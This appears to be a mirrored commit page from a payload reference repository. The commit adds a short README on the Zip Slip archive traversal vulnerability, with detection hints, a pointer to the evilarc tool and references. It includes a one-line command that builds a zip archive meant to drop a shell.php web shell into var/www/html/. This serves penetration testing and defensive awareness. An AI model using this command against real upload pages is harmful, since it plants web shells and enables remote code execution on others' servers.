mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 22:33:00 +00:00
Update and rename ReadMe.txt to README.md
This commit is contained in:
parent
5fec4f7c21
commit
83569c6142
2 changed files with 35 additions and 1 deletions
35
Upload Insecure Files/Zip Slip/README.md
Normal file
35
Upload Insecure Files/Zip Slip/README.md
Normal file
|
@ -0,0 +1,35 @@
|
|||
# Zip Slip
|
||||
|
||||
> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.
|
||||
|
||||
## Summary
|
||||
|
||||
- [Detection](#detection)
|
||||
- [Tools](#tools)
|
||||
* [Exploits](#exploits)
|
||||
* [Basic Exploit](#basic-exploit)
|
||||
- [Additional Notes](#additional-notes)
|
||||
|
||||
## Detection
|
||||
|
||||
- Any zip upload page on the application
|
||||
|
||||
## Tools
|
||||
|
||||
- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
|
||||
|
||||
## Exploits
|
||||
|
||||
### Basic Exploit
|
||||
|
||||
```python
|
||||
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
|
||||
```
|
||||
|
||||
### Additional Notes
|
||||
- For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability
|
||||
|
||||
## References
|
||||
|
||||
- [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability)
|
||||
- [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability)
|
|
@ -1 +0,0 @@
|
|||
|
Loading…
Reference in a new issue